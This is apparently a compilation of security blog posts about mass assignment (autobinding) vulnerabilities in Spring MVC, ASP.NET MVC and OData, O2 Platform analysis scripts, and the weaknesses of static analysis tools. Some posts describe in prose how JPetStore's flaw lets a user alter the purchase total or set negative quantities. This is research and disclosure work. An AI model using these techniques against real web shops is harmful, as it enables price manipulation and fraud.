But for F4F to really live to its potential, we will need a much better understanding of how it works and how
it can be used (IBM will also need to release F4F under an open licence, but that is a topic for another post).
The first step is to visualize what is already in the WAFL files (part of F4F) and how they can be created and
manipulated.
There are already a couple WAFL related scripts in O2 but we need a lot more :)
9 January 2013
January 2013
75
OData ASP.NET Web API: An Mass Assignment vulnerability in the

making?
When I saw Getting started with OData services in ASP.NET Web API (via reddit) :
I immediately thought Mass Assignment Vulnerability!

**
**The part that raised my alarm was:
and
January 2013
76
There are no mentions in that article of the words security or mass assignment so I wonder how much
awareness there is for this issue?
Anybody has cycles to test it out?
**
****Is there any documentation for the OData ASP.NET Web API on this topic? **I couldnt find any references
in OData in WebAPI RC release and OData support in ASP.NET Web API
Mass Assignment Vulnerability references:
Mass assignment in Rails applications blog.mhartl | Michael Hartls tech blog and Finding and fixing
mass assignment problems in Rails applications blog.mhartl | Michael Hartls tech blog
#26 Hackers Love Mass Assignment RailsCasts
Ruby on Rails Guides: Ruby On Rails Security Guide
http://en.wikipedia.org/wiki/Mass_assignment_vulnerability
6 Ways To Avoid Mass Assignment in ASP.NET MVC
On Rails mass-assignment, Github and the apocalypse :: Labs :: Headshift
OWASP Heiko Webers Ruby on Rails Security (pdf)
Newest mass-assignment Questions - Stack Overflow
Auto-Binding Vulnerability references (another name for Mass Assignment):
January 2013
Solution for fixing Springs JPetStore AutoBinding vulnerabilities
Dinis Cruz Blog: Current O2 support for analyzing Spring MVC
Finally here is how I have been analysing Spring MVC apps using O2
Starting to use the O2 Spring MVC viewer on ThreadFix
77
January 2013
78
Should Mass Assignment be an OWASP Top 10 Vulnerability?

I was just having a thread with Dave (who is working on the OWASP Top 10 2013) about the idea that Mass
Assignment vulnerabilites should be part of the next OWASP top 10, and here is his view:
_It has to be more prevalent than other issues, plus introduce as much, or more risk. The Risk methodology
in the Top 10 is very explicit.
I just looked through ALL the stats provided as input to the OWASP Top 10 for 2013 and I find zero mention
of AutoBinding or Mass Assignment.
I know Aspect has found some of these vulns, in the past few years, but we are talking about a handful that
weve found out of 1000s of issues total.
Clickjacking hasnt even made it into the Top 10 and its way more prevalent, I assume.
That said, doesnt mean we cant start some kind of awareness campaign at OWASP about new issues like
Mass Assignment and Expression Language Injection, and anything else new/cool you are aware of.
1st steps would be to create an article about each vulnerability, and then get the code review and testing guides
to cover those topics, and also maybe a Prevention Cheat Sheet for each too. The article and Cheat Sheet are
the easiest things to knock out first.
_
My view is that it should be in the next OWASP Top 10, so I guess we need to start adding info about this
vulnerability to the guides and cheat sheets :)
I will also help if we have data about how big this issue is, namely how many apps are vulnerable to it.
To see two practical examples of this vulnerability, take a look at:
Mass Assignment Vulnerability references:
Mass assignment in Rails applications blog.mhartl | Michael Hartls tech blog and Finding and fixing
mass assignment problems in Rails applications blog.mhartl | Michael Hartls tech blog
#26 Hackers Love Mass Assignment RailsCasts
Ruby on Rails Guides: Ruby On Rails Security Guide
http://en.wikipedia.org/wiki/Mass_assignment_vulnerability
6 Ways To Avoid Mass Assignment in ASP.NET MVC
On Rails mass-assignment, Github and the apocalypse :: Labs :: Headshift
OWASP Heiko Webers Ruby on Rails Security (pdf)
Newest mass-assignment Questions - Stack Overflow
Auto-Binding Vulnerability references (another name for Mass Assignment):
January 2013
Dinis Cruz Blog: Current O2 support for analyzing Spring MVC
Finally here is how I have been analysing Spring MVC apps using O2
79
10 September 2008
September 2008
81
ASP.NET MVC XSS and AutoBind vulns in MVC Example

A while back (while in the middle of the research that lead to the publishing of the Security Vulnerabilities
in the Spring Framework Model View Controller) I decided to check out if the (still in beta) ASP.NET MVC
framework was vulnerable to it.
At first quick analysis it looks vulnerable to the AutoBinding issue (and also to XSS), so here is my draft
research notes as download file ASP.NET MVC - XSS and AutoBind vulns in MVC).
Please let me know if I am missing something obvious, or maybe there is something on the new version that
prevents this:
Some MVC related links:
latest blog post from Scott G http://weblogs.asp.net/scottgu/archive/2008/09/02/asp-net-mvc-preview5-and-form-posting-scenarios.aspx
Download latest version: http://www.codeplex.com/aspnet/Release/ProjectReleases.aspx?ReleaseId=16775
http://blog.codeville.net/2007/12/19/aspnet-mvc-prevent-xss-with-automatic-html-encoding/
http://www.asp.net/mvc/
11 September 2009
September 2009
83
Spring MVC 3.0 MVC Binding rules

Following the work done on the O2 Cmd - Spring MVC module and the conversations we had at OWASP
AppSec Ireland about the security implications of the Spring Framework MVC, I spent some time today
looking at what is happening at its next major release (3.0.x)
From the MVC documentation section 15.3.2.3 Supported handler method arguments and return types section
in Spring 3.0 (see 15.3 Implementing Controllers ) we can see (included at the end of this post) the Spring
MVC rules to:
a) map web data into controllers and
b) send data from controllers to the views.
There are quite a number of new features/capabilities, and most have security implications!
For reference, here are a number of good articles & Blog Posts on Spring MVC 3.0
Spring Finance > Part 2: Spring @MVC & Spring 3.0 REST integration
New stuff in Spring 3.0 & New stuff in Spring 3.0, part 2
REST in Spring 3: @MVC
Spring 3 MVC CodeMash 2009
Spring 3.0 docs: 2.5 Overview of new features , 15.3 Implementing Controllers
GWT, Spring 3.0 MVC, and REST on Google App Engine / Java - Part 1 & GWT, Spring 3.0 MVC, and
REST on Google App Engine / Java - Part 2
I find a bit worrying that the security implications of the way Spring MVC works (for both old and
new features) is NOT properly documented in these articles (for example making references to Security
implications of the Spring DataBinder (note-to-self: create page with my & others past research on this topic))
The list below (from 15.3 Implementing Controllers) is what we need to add to the next version of O2 Cmd Spring MVC module so that it supports Spring MVC 3.0 (in fact I need to dig out the docs about Spring MVC
2.5 works, and start there :) )
15.3.2.3 Supported handler method arguments and return types
Handler methods that are annotated with __@RequestMapping_ can have very flexible signatures. They may
have arguments of the following types, in arbitrary order. (except for validation results, which need to follow
right after the corresponding command object, if desired):_
Request and/or response objects (Servlet API). Choose any specific request/response type, for example,
__ServletRequest_ / _HttpServletRequest_._
Session object (Servlet API): of type __HttpSession_. An argument of this type enforces the presence of
a corresponding session. As a consequence, such an argument is never _null_._
_org.springframework.web.context.request.WebRequest__ or _org.springframework.web.context.request.Nativ
. Allows for generic request parameter access as well as request/session attribute access, without ties to
the native Servlet/Portlet API._
September 2009
84
_java.util.Locale__ for the current request locale, determined by the most specific locale resolver
available, in effect, the configured _LocaleResolver_ in a Servlet environment._
_java.io.InputStream__ / _java.io.Reader_ for access to the requests content. This value is the raw
InputStream/Reader as exposed by the Servlet API._
_java.io.OutputStream__ / _java.io.Writer_ for generating the responses content. This value is the
raw OutputStream/Writer as exposed by the Servlet API._
_@PathVariabe__ annotated parameters for access to URI template variables. See _Section 15.3.2.1, URI
Templates_._
_@RequestParam__ annotated parameters for access to specific Servlet request parameters. Parameter
values are converted to the declared method argument type. See _Section 15.3.2.4, Binding request
parameters to method parameters with @RequestParam_._
_@RequestHeader__ annotated parameters for access to specific Servlet request HTTP headers. Parameter values are converted to the declared method argument type._
_@RequestBody__ annotated parameters for access to the request HTTP body. Parameter values are
converted to the declared method argument type using _HttpMessageConverter__s. See __Section
15.3.2.5, Mapping the request body with the @RequestBody annotation_._
_java.util.Map__ / _org.springframework.ui.Model_ / _org.springframework.ui.ModelMap_ for
enriching the implicit model that is exposed to the web view._
Command or form objects to bind parameters to: as bean properties or fields, with customizable
type conversion, depending on __@InitBinder_ methods and/or the HandlerAdapter configuration.
See the_webBindingInitializer_ property on _AnnotationMethodHandlerAdapter_. Such command
objects along with their validation results will be exposed as model attributes by default., using
the non-qualified command class name in property notation. For example, orderAddress for type
mypackage.OrderAddress. Specify a parameter-level _ModelAttribute_ annotation for declaring a
specific model attribute name._
_org.springframework.validation.Errors__ / _org.springframework.validation.BindingResult_validation results for a preceding command or form object (the immediately preceding argument)._
_org.springframework.web.bind.support.SessionStatus__ status handle for marking form processing as complete, which triggers the cleanup of session attributes that have been indicated by
the_@SessionAttributes_ annotation at the handler type level._
The following return types are supported for handler methods:
A __ModelAndView_ object, with the model implicitly enriched with command objects and the results
of _@ModelAttribute_ annotated reference data accessor methods._
A __Model_ object, with the view name implicitly determined through a _RequestToViewNameTranslator_and the model implicitly enriched with command objects and the results of _@ModelAttribute__annotated reference data accessor methods.
A __Map_ object for exposing a model, with the view name implicitly determined through a _RequestToViewNameTranslator_ and the model implicitly enriched with command objects and the
results of_@ModelAttribute_ annotated reference data accessor methods._
A __View_ object, with the model implicitly determined through command objects and _@ModelAttribute_annotated reference data accessor methods. The handler method may also programmatically enrich the
model by declaring a _Model_ argument (see above)._
September 2009
85
A __String_ value that is interpreted as the view name, with the model implicitly determined through
command objects and _@ModelAttribute_ annotated reference data accessor methods. The handler
method may also programmatically enrich the model by declaring a _Model_ argument (see above)._
_void__ if the method handles the response itself (by writing the response content directly, declaring an
argument of type _ServletResponse_ / _HttpServletResponse_ for that purpose) or if the view name
is supposed to be implicitly determined through a _RequestToViewNameTranslator_ (not declaring a
response argument in the handler method signature)._
If the method is annotated with __@ResponseBody_, the return type is written to the response
HTTP body. The return value will be converted to the declared method argument type using_HttpMessageConverter__s. See __Section 15.3.2.6, Mapping the response body with the @ResponseBody annotation_._
Any other return type is considered as single model attribute to be exposed to the view, using the attribute
name specified through __@ModelAttribute_ at the method level (or the default attribute name based
on the return type class name). The model is implicitly enriched with command objects and the results
of _@ModelAttribute_ annotated reference data accessor methods._
September 2009
86
Finally here is how I have been analysing Spring MVC apps

using O2
One of the greatest challenges I always had when reviewing Spring MVC applications, was to gain a full
picture of its controllers, and more importantly its CommandClasses (i.e. the POJOs that are AutoBinded by
Spring and who are a common source of high/critical vulnerabilities in Spring MVC apps).
The way I approach these problems (visualizing/understanding Spring, Struts, DWR, Sharepoint, etc), is to
write scripts that consume the Applications articfacts (web.xml, *-servlet.xml, source-code, class files) and
then consolidate that information in easy (or easier) to undersand visualizations.
Unfortunally most of the great examples that I had in the past were built on top of Client code, so I couldnt
really share them. But finally, the O2 Scripts have reached a level of maturity that it was easy to create a
generic version of them for Springs MVC Demo application: JPetStore.
Ironically, this demo application from Spring (which is used by Spring Developers to learn how to use Spring),
is actually vulnerable to a number of security issues, including some spectacular cases of the Spring MVC
AutoBinding issue.
I have created a number of Blog posts and videos that hopefully will help you to understand (and replicate)
the issue:
O2 Script with BlackBox exploits for Spring MVC AutoBinding vulnerabilities in JPetStore (with video)
- Blog post that shows a number of security exploits in action, for example: create a shopping cart, to
though the payment process, and change the total value on the last step
O2 Script: Spring MVC Util View Controllers (with video) - Blog post that presents a visualizer for
the Spring MVC mappings. This is the most imporant script here , since this is the view that is really
unique (and the one I have not seen anywhere else). What you have there is a full mapping of the
Spring MVC properties for JPetStore, which includes not only the URL to Controller mappings, but
(much more important) a expanded view of the CommandClass. And altough the JPetStore example
is already quite a good one, in the real world these POJO objects tend to be massive (with cases where
the developers/management only expects that only a couple fields should be populated from an HTTP
request, and in reality, dozens if not hundreds of fields can be edited/manipulated)
O2 Script for Spring MVC JPetStore Start Servers (start/stop apache and hsqldb) (with video) - Blop
post that shows an O2 Script that starts the apache and hsqldb server
http://s3.amazonaws.com/Demo_Files/jPetStore%20-%20O2%20Demo%20Pack.zip - Fully packaged version of JPetStore and relevant O2 Scripts (it is 30Mb because it includes apache server)
http://diniscruz.blogspot.com/2011/07/two-security-vulnerabilities-in-spring.html - Blog post with a
couple more details about the Spring MVC AutoBinding vulnerability (exploited above) and a link
to the 2008 white paper published on this topic
The other important factor about these examples, is that I finally have a real example that can be used when
talking with the Spring Framework team, other OWASP/AppSec FOSS tools and with AppSec vendors (tools
and service-providers). Basically, from now on the message is: here is a complete scenario, now lets figure
out how to use your technology to fix, detect or mitigate this.
**
**
September 2009
87
This is also a part of O2 that I was waiting for, in order to be able to fully participate in the current
OWASP reach the developer efforts. In order to reach the developers, we need to speak their language, and
with these examples (and technology) I can finally communicate properly with developers, and show them
how their app works.
Note that the point here is not to push that everybody should be using using O2 to perform this type of
analysis! My objective with O2 is to show what can/should be done, and to allow others to create more native
implementations of these techniques (in this case, there should be an eclipse plug-in to do this or to consume
this data). Ultimately if we want to reach the developers we need to communicate with them using tools and
techniques they are already used to.
There is still a lot to document and to map out (including other tools that merge even further the blackbox and white box worlds), so please take these scripts for a test drive, and help me to create a really
powerful Spring MVC Security Analsys ToolKit that can dramatically increase the security of Spring
MVC applications :)
We also need to start thinking about creating an (Open) Spring MVC Security Rule Pack which can be
maintained by the community and consumed by the multiple tools/services.
Final note for the .NET Crowd, the ASP.NET MVC has the same problem, and I although I have not looked
at a big ASP.NET MVC app, I will bet that they will create the same types of vulnerabilties (so if you have
access to such an app, try the O2s ASP.NET MVC visualizer on it :) )
September 2009
88
Reaching out to Spring Developers

I just posted an entry on the Spring Framework forums http://forum.springsource.org/showthread.php?111901Security-Vulnerabilities-with-JPetStore-and-visualization-of-the-AutoBinding-Issues which hopefully will get
some tracking from their side.
I will reach out to my contacts over there (Spring Source), but if you know somebody at SpringSource (or at
a heavy user of Spring MVC) please put them in touch.
Thanks
September 2009
89
Couple more blog posts on JPetStore and additional Spring MVC

Autobinding vulnerabilities
On the Spring MVC topic, I added a couple more blog posts and video to the O2 developer blog:
http://o2platform.wordpress.com/2011/07/13/viewing-jpetstore-hsqldb-database-and-couple-more-autobindingissues/
http://o2platform.wordpress.com/2011/07/13/writing-an-o2-ie-automation-script-for-jpetstore-accountcreation/ with supporting YouTube video http://www.youtube.com/watch?v=J4Ojqzb6qsw
http://o2platform.wordpress.com/2011/07/13/injecting-firebuglite-and-jquery-into-a-ie-automation-pagejpetstore-example/
http://o2platform.wordpress.com/2011/07/13/creating-an-api-for-jpetstore-browser-auto/
I also noticed that using the same autobinding vulnerability, it is possible to change the quantity of the item
being purchased to a **negative **value which has interesting implications on the current purchase and more
importantly on the global (to JPetStore) item stock quantity value.
I have not scripted this latest issue, but if you want looking at trying these scripts, why dont you have a go
at writing it?
:)
September 2009
90
Visualizing Spring MVC Annotations based Controls (and

If you want to use O2 on Spring MVC apps that use Annotation-Based controllers, there is an O2 module that
you can use which will allow you to view/test those controllers (including the Autobinding elements)
Here is a blog post that shows how it works: Visualizing Spring MVC Annotations based Controls (and
This is quite an old O2 module (using the previous GUI), but what I really like about it, is that it shows how
static analysis can be used to drive black box tests (which is the best way to perform blackbox reviews).
What we really need next, is to convert this code into the new O2 Script based world and into the Spring
MVC mappings classes (as shown in the JPetStore example).
September 2009
91

During the past week I spent some time documenting O2s support for Spring MVC apps.
There is still quite a lot to do before we can do a proper security analysis of the JPetStore and PetClinic
applications (for example mapping the JSPs to the controllers), but hopefully these blog posts show the kind
of analysis that is possible using O2:
O2 Script with BlackBox exploits for Spring MVC AutoBinding vulnerabilities in JPetStore
O2 Script: Spring MVC Util View Controllers
Finding the JSP views that are mapped to controllers in JPetStore (Spring MVC)
Visualizing the links in JPetStore (Spring MVC)
O2 Script for Spring MVC JPetStore Start Servers (start/stop apache and hsqldb)
Simple Viewer to see JSP files (example using Spring MVC SPetStore)
Util Java, Jsp and Xml File Search (Example using Spring MVC JPetStore)
JPetStore and PetClinic are demo apps which can be downloaded from here Packaged Spring MVC Security
Test Apps: JPetStore and PetClinc (includes tomcat), or from the main Spring Framework source distribution
(look in the samples folder)
For more details on the Spring MVC Autobinding Vulnerabilities see: Two Security Vulnerabilities in the
Spring Frameworks MVC pdf (from 2008)
September 2009
92
What needs to be done to map Static Analysis Traces from

Controllers and Views
Here is a reply I just posted on the O2 Mailing list, which provides a number of ideas on how to map/glue
partial traces (i.e. traces that have sinks on Controllers and Sources on Views)
I think we are exactly on the same page, and welcome to the wonderful world of Framework behaviour
mapping :)
Ive done this quite a lot in the past, so let see if I can help you here.
The first thing you must do is to make sure that you have scriptable access to ALL required artifacts. Since
you will need to be doing a lot automagically glueing, you have to make sure that you can programatically
access the data you need.
From what I understand you already have the traces for the controllers and the views. So what about the
config files? Is everything on those config files, or will you also need to parse the java/class files for more
metadata. Btw, this is J2EE right?
The next thing you need to do, is to figure out the exact formula that maps the controllers to the views. And
before you go any further you need to have a visualization of this (which can be as simple as a treeview, or
as complex as a full blow graph model (which you can also do with O2 :) ).
After that, you will need to look at your sinks and sources and see if they are easy to match (this has to be
done after you matched the controllers with the view, or you will get a huge amount of mappings, most of
which will never happen in the real-world). One of the beauties of the IO2Finding and O2Trace format is that
I was able to join traces by simple doing string matches (there are even helper methods to do that).
The idea/concept for Joining traces, is that you rewrite the Sinks and Sources so that they match:
For example, if you had a Controller Sink with
setAttribute(A_KEY , {taint value})
and a **View Source **with
getAttribute(A_Key)
Then I would rewrite them (in-memory or in disk (if there is a large number of findings)) as:
Controller Sink -> getset_Attribute_A_KEY ()
** View Source ** ->** ** getset_Attribute_A_KEY ()
and then just:
do a direct string Sink-to-Source match,
September 2009
93
glue them with a one-to-many traces/finding generation mode (i.e you will need to create a new trace
for each unique Sink-to-Source mapping),
look at the created findings (and finally you will be able to gain a better picture of what is going on)
This actually works very well, and scales spectacularly.
I have used this on lots of different glue locations: Session/Global Variables, Interfaces, Database layers,
Controllers->Views, Reflection, Aspect PointCuts, Validation routines, etc
A good way forward is probably if we work together on doing this for Spring MVCs JPetstore, since Ive already started this process and it is a great case study. See the posts at http://o2platform.wordpress.com/category/java/springmvc/jpetstore/ , and my next step on this JPetStore security analysis is exactly to create a mapping for the JSPs
(check out this post which talks about that: Finding the JSP views that are mapped to controlers in JPetStore
(Spring MVC) )
Does this make sense?
Dinis Cruz
(end-of-email)
12 October 2011
October 2011
95
Why doesnt SAST have better Framework support (for example

Spring MVC)?
I received this question today, and before I answered it, I was wondering if you guys wanted to have a go at
it first:
I was reading over some of your blog entries, that made me thinks about the current state of SAST regarding
the current frameworks.
Ive been aware for a long time that SAST do not handle properly framework-level information. In the case of
Spring MVC, the tools just dont get the data flow, etc.
_
_
Since you worked at Ounce before, do you know any particular reason why they didnt want to fo into that
direction? I mean, this is a solvable problem (you somewhat show how to do that in O2). Even if they would
need to implement new front-ends, this is still a very important task to be done if they wanted to compete
directly with Fortify (especially since F. doesnt get it either).
For reference here are some of my previous Framework (i.e.Spring MVC) related posts:

What needs to be done to map Static Analysis Traces from Controllers and Views
http://o2platform.wordpress.com/category/java/spring-mvc/ (numbers of code samples at O2s blog)
In this (longish presentation) I also talk about some of the challenges that we have in supporting
frameworks: http://www.slideshare.net/DinisCruz/owasp-o2-platform-november-2010
What do you think?

[Update blog post: What does SAST mean? And where does it come from?]
October 2011
96
What does SAST mean? And where does it come from?

After I posted Why doesnt SAST have better Framework support (for example Spring MVC)? I received the
question What is SAST? (which is a valid question since a Google search today for SAST returns some
hilarious answers)
SAST **means **Static Analysis Software Testing , and (I believe) it was originally coined by Gartner when
they published their Magic Quadrant for Static Application Security Testing report (first version in 2009).
SAST is basically what we usually (in the web world) call** Static Analysis of source code** (i.e. White Box
tools). It cousin is DAST (Dynamic Application Security Testing) and is what we call Pentesting (i.e. BlackBox
tools). Googles DAST search results are also funny. Here is a more detailed answer on the difference between
SAST and DAST.
As you will seen in Gartners website, they change for this report, but some companies have bought them and
posted/leaked the PDF online (in a way that Google finds it)
1st edition: 6 February 2009 here
2nd edition: 13 December 2010: here and here (linked from http://www-01.ibm.com/software/rational/info/gartnersecurity/)
Here are couple other blog entries about this:
https://www.fortify.com/ssa-basics/Gartner2010MQ_SAST.html
http://blogs.gartner.com/neil_macdonald/2011/01/19/static-or-dynamic-application-security-testing-both/
https://blog.whitehatsec.com/tag/sast/
Back on the topic of Framewoks, Neil MacDonald (from Gartner) is absolutely spot on in this 2009 entry: For
Static Application Security Testing, Frameworks Matter
Btw, I wonder when will the O2 Platform be included in a Gartner Magic Quadrant report?
October 2011
97
First Answer to: Why doesnt SAST have better Framework

support (for example Spring MVC)?
A couple days ago I received the question and asked here on this blog Why doesnt SAST have better
Framework support (for example Spring MVC)? (if dont dont what SAST means, see What does SAST mean?
And where does it come from?)
I wrote the answer below on that day, but since I also posted this question to the O2 mailing list I wanted to
give some space for others to chip in with their views (which they did, namely John Steven who I will reply
to later):
There are a number of reasons why the tool vendors have not been able to provide decent (or even any) wide
Framework Support on their tools
Note that this is not for lack of trying, for example the latest version of AppScan already supports WAFL
(Web Application Flow Language) which is their attempt at creating a Framework descriptor language, HP
is doing interesting work in their integration of WebInspect+Fortify and there are a couple new players (like
WhiteHat, Veracode, Armorize) that claim will do a better job.
For me, the key problem that all tools have (not only SAST, but this is critical in SAST) is that they are all
trying to find a big red button while ignoring how the app actually works/behaves. They basically want to
create a product that can just be pointed to an application and work.
The problem with this approach is that all apps are massively different!
The apps themselves are build on top of MASSIVE frameworks (from a point of view of their behaviour), and
even when they use common frameworks (vs writing their own frameworks), the way the actual code flows
tends to be quite unique per app.
So by trying to treat the Application Behaviour as a black box, and choosing NOT to try to (really)
understand/map how it works (beyond the default Java/.NET functionality or whatever Framework Support
they are able to have), these tools are trying to climb a mountain that is far too big and complex.
My approach with O2 has been **I know I will have to map how the application works/behaves and that I
will need to create (from the source-code or dynamic analysis) an working model of its real code/data-flows,
and while Im there, also create a set of rules for the tools that I can use. My only question is: how long will
it take to gain the level of visibility that I will need in order to be able to do a good job. **This is what I call
playing the Application Visibility game
_
_
Basically with O2 Im climbing a complete different mountain.
Lets take for example Spring MVC. The first things I do when looking at a Spring app are:
review the source code in order to codify how the controllers are configured and what is their
behaviour (namely the URLs, Command Classes and Views).
paying special attention to any Framework behaviour modifications, for example filters, authentication/authorization engines, or even direct spring MVC code patches
October 2011
98
then I continue these mappings into the inner-working of the application in order to identify its hyper
jumps (reflection, aop, setters/getters, hash-objects-used-to-carry-data, web services, data/storage
layers, other abstraction layers, etc) and data changing steps like validation or object casting.
then I map out the connection between the controllers and the views (which is very important because
we cant assume that there will be path into all views from all controllers)
then. (next actions depend on how the app is designed and what other APIs or Frameworks are used)
When Im doing these steps, I (using O2) tend to do three things:
Create mini tools that visualize what is going on (for example url mappings to controllers, or the
complete command classes objects )
Create Browser-Automation APIs that represent the expected behaviour of the target application (how
to login, how to perform action XYZ, how to invoke a Web Service, etc)
Mass create rules for the tools available (for example I used to create 1000s of Ounce rules so that I
would get the most of its Engine by getting it to create as many taint-flow traces as possible
So yes, Im coding all the time
The only difference between engagements, is that Im able to build on the technology developed on the
previous engagements.
Again using Spring MVC as an example:
First time I saw Spring MVC I had a script that did a dirty read of the XML files and extracted some
metadata (with a lot of manual mappings)
On next engagement I was able to add support for Java bytecode analysis and analyse the Spring MVC
attributes (used to mass create Ounce rules)
On next engagement , I was able to start visualizing the Command Classes and created an generic API
for Spring MVC (with specific classes/objects to store Spring MVC metadata in a way that made sense
to us (security consultants))
On next engagement , I added a number of real powerful GUIs, improved the CommandClass resolution
calculations and did a bunch of mappings between controllers and viewers
On next engagement , I already had most of the core Spring MVC behaviour scripts in place, so I mainly
focused on what specific about the application being analyzed
As you can see, although there is always some level of customization, its amount (and skill level) is reduced
on each interaction (and this is how we will scale this type of analysis).
So to play this game (and to be able to do this type of analysis), this is what is needed from the tools used (in
this case SAST)
Ability to write scripts that directly control how the tool works
Ideally most of the tools analysis capabilities is written in dynamically compiled scripts so that it is
possible to modify/adjust them to the current reality (created by the application being analysed)
Ability to have direct access the tools internal capabilities via exposed APIs
October 2011
99
Ability to start and stop each analysis phase (with each phase providing a modifiable dump of its
internal representations and analysis so far)
Ability to consume, feed and correlate data from all sorts of sources: file system, config files, black-box
scans, fuzzers, real-time instrumentation, security consultants brain
Ability to mass create/manipulate rules
Ability to write rules as scripts AND in a fast-prototyping language like: C#, Java, Python, Ruby or
Javascript (i.e. not in C/C++ or XML)
Ability to easily process, filter and visualize in real-time thousands if not millions of findings (created
by the large number of rules applied)
Ability to create rules that analyse the thousands if not millions of findings findings created (i.e. create
findings from findings)
this is the ability to perform multi-phase analysis, each using different rules/techniques and
targeted at a different types of vulnerabilities (for example SQL Injection vs Direct Object
References)
Ability to visualize the data that was created (in its multiple stages of maturity) so that a security
consultant (and/or app developer) can help to connect the dots (with more scripts or config settings)
Ability to add business logic analysis to the findings discovered. (for example when taking Authorization and Authentication activities in account, an direct SQL execution or file upload security
vulnerability finding in an admin panel, might actually be a feature)
Ability to re-package the final findings into the SDL tools currently used by the client (bug tracking,
collaboration, IDEs), in a way that makes sense to the client (i.e. using their terminology and workflows)
and is immediately consumed
Ability to package all analysis (and rules, workflows, scripts, etc) into a single execution point (i.e. an
*.exe). This is the big button that can be inserted into the Build process
Ability to execute individually the complete analysis required to confirm (and ideally to exploit) a
particular issue. This is the small button that can check if ONE issue has been fixed
And here you can see why the SAST tools really struggle with frameworks, because they dont want to play
this game. Ironically the end result is the same big button to press and get solid results , the only difference
is how to get there.
My personal view (backed by real world experience) is that this is the only way that_ good enough_framework support can be added to a SAST tool in a way that it will actually be usable by developers.
Note that I said_ good enough,** because usually the comment I receive when explaining that we
need to do this is **..well but only you (Dinis) wants this and what we (tool vendor XYZ) wants to
do, is to provide Good Enough support . _
_
_
Unfortunately for the tool vendors, Im not asking for them to create a tool that would only add value to
a small number of expert security consultants. Im describing what they will need to do in order to add
good enough support for frameworks to their tools. Only then security consultants and app developers can
customize those tools and deploy them to a wide audience (finally being able to have decent support for
the frameworks used and the target apps). The cases where there is no need to customize the engine (or rules)
should be seen as free passes (i.e. easy sales)
October 2011
100
The bottom-line is that, if the path chosen by the tool vendors really worked, then today (Oct 2011), we should
have much better Framework support in our tools. The reality is that we dont even have in our current SAST
tools decent support for vanilla Java or .NET language behaviours (for example: reflection, collections, arrays,
base-classes behaviour). And part of the reason of currently struggle with Java or .NET, is because its core
libraries are in itself a Framework :)
The good news is that I have shown with O2 how my proposed model can work in the real-work. It was done
on top of an Open Source platform (O2), and it is out there for others to learn and copy
Unfortunately, I am one of the few O2 users that can really do this, so the next step is to find a way to scale O2s
techniques/usability and help SAST (and others) tools to develop/expose similar technology and wokflows.
Finally, the other reason why the tools vendors are not doing this is because there is very little public (i.e.
on the record) customer demand for this! Those nasty NDAs have a powerful side-effect on buyers (and end
users) who wont publicly say what they really think.
So in some ways, it is not 100% the vendors fault. They tend to react to their paying customers needs, who
(since they cant say the tool doesnt really work in my environment) tend to ask for thinks like: You need
to be able scan XYZ Millions of line of code, You need to have support for Oracle databases, you need to
have a report for the PCI XYZ, You need to support language XYZ, etc
Add to this the fact that SAST vendors :
dont see the security consulting companies (who would ask for the capabilities described above) as
their partners (i.e. they try to get as much money from them as possible),
want to control all/most the technology that they consume/create
dont have enough paying customers that put them to the ropes and demand that their tools really work
still believe (or want to believe) that their tools actually work
dont have to deal with the side-effects of applications scanned by their product got exploited by
malicious attackers (i.e. got sued by their clients or by the attackers victims)
and you have a world where the SAST vendors dont have an direct incentive to go down this path.
Note that some paying customers DO get some value from the current SAST tools (the ones that dont have
SAST tools as shelfware). And since there are no popular alternatives (O2s market share is still very small :)
), these customers are resigned with the current status-quo (the others are trying to ignore the fact that they
spent a pile of money of a tool that they have not found a way to work in their environment, or are trying to
hire a consulting company to make it work).
The tragedy is that SASTs marked could be enormous!!!
Just imagine that we were able to use SAST tools in a way that they were really able to map/visualize/analyze
an entire code/data flow, and create solid, defensible and comprehensive results (with very low False
Positives and False Negatives)
Dont you think the developers (and managers architects, buyers, consumer groups, government agencies,
etc..) would be ALL over it?
This is what I am to say in my Making Security Invisible by Becoming the Developers Best Friends
presentation. If only we could be the developers best friends by showing them how their app actually works
and what are the side effects of their code :)
October 2011
101

Here is an O2 blog post that describes my preferred solution for Fixing one of JPetStores AutoBinding
Vulnerabilities (changing the purchase price)
I have to say that as a developer doing the code fix, it was simply amazing and very powerful to have the
complete web workflow of the shopping cart available as an automated O2 script .
This allowed me to quickly ensure that:
a) the app still behaved as it should (after the fix)
b) the vulnerabilities identified where properly fixed
What do you think of the solution?
13 April 2012
April 2012
103
Some proposed Visions for next OWASP Summit

Since Summits must be part of OWASPs DNA , and in case some of you are thinking of putting energy in
creating the next OWASP Summit, I really think that the Summit Proposal concept I detailed here is a good
model.
So starting from the point that first we need a strong theme/vision, here are a couple ideas:
OWASP Summit on OWASP Projects - This would actually be at least one or more mini-Summit(s)
followed by a bigger one. The mini-summit(s) would be focused on very specific OWASP projects
activities (project review, projects normalization/mapping, project XYZ, work, projects consolidation,
GIT migration, etc) with the bigger Summit the one where the results (of those mini-summits) would
be presented, and the main stakeholders (i.e. the OWASP Projects users) would come together to learn,
share and collaborate
**OWASP Summit on Web Frameworks - **This would be the location where the key players of Web
Frameworks (like Spring, Struts, Apache Shiro, RoR, ASP.NET, J2EE Stack,Grails etc) would come
together with OWASPs community, AND developers AND their clients. The key objective would be
to figure out how to help to make those frameworks/platforms secure by default or at least to allow
developers to easily code them in a secure way. In fact we could even be a bit radical and do a **OWASP
Summit on Apache Shiro **(http://shiro.apache.org/) since those guys are clearly doing something right
and have the momentum in working with key frameworks
OWASP Summit on Static Analysis - This is one that Im specially very interested in, and would be
focused on figuring a way to really make Static Analysis work in a web security world. There is so much
potential with SAST technology which currently is not fulfilled because the multiple parties (from tools
developers, to security consultants, to users, to clients, to regulatory bodies, etc) are not collaborating
and working together to figure out a number of Open Standards which we call all use to communicate
(for example why cant we feed static analysis data to a web proxy/scanner like ZAP?)
OWASP Summit on Web Privacy - Privacy is becoming more and more a big issue in the Web World,
and with: a) Browsers adding features like the Do not track header (http://donottrack.us/ ), b) new
laws being passed, c) recent big privacies breaches, d) governments regulatory bodies wanting to do
something about it , and {many more recent developments} Privacy is definitely a topic which will
draw a good crowd (and although one day it might be big enough to have its own dedicated Brower
Summit, I think in the short them, the Browser track (following the work done at the last Summit)
should be part of this Summit).
Of course that there are many other hot topics or OWASP Projects we could create a Summit around (ESAPI,
OpenSamm, Guide Trilogy, Cloud, DAST, Secure Coding, Code Review, PenTesting, etc), what is needed to
make it happen is a core team with passion and energy for it.
On the financial side of things, one thing that OWASP could do is to say:_ Here is 50k seed money, the rest
you need to find from other sources (including internally like OWASP Chapers)_. And maybe even that 50k
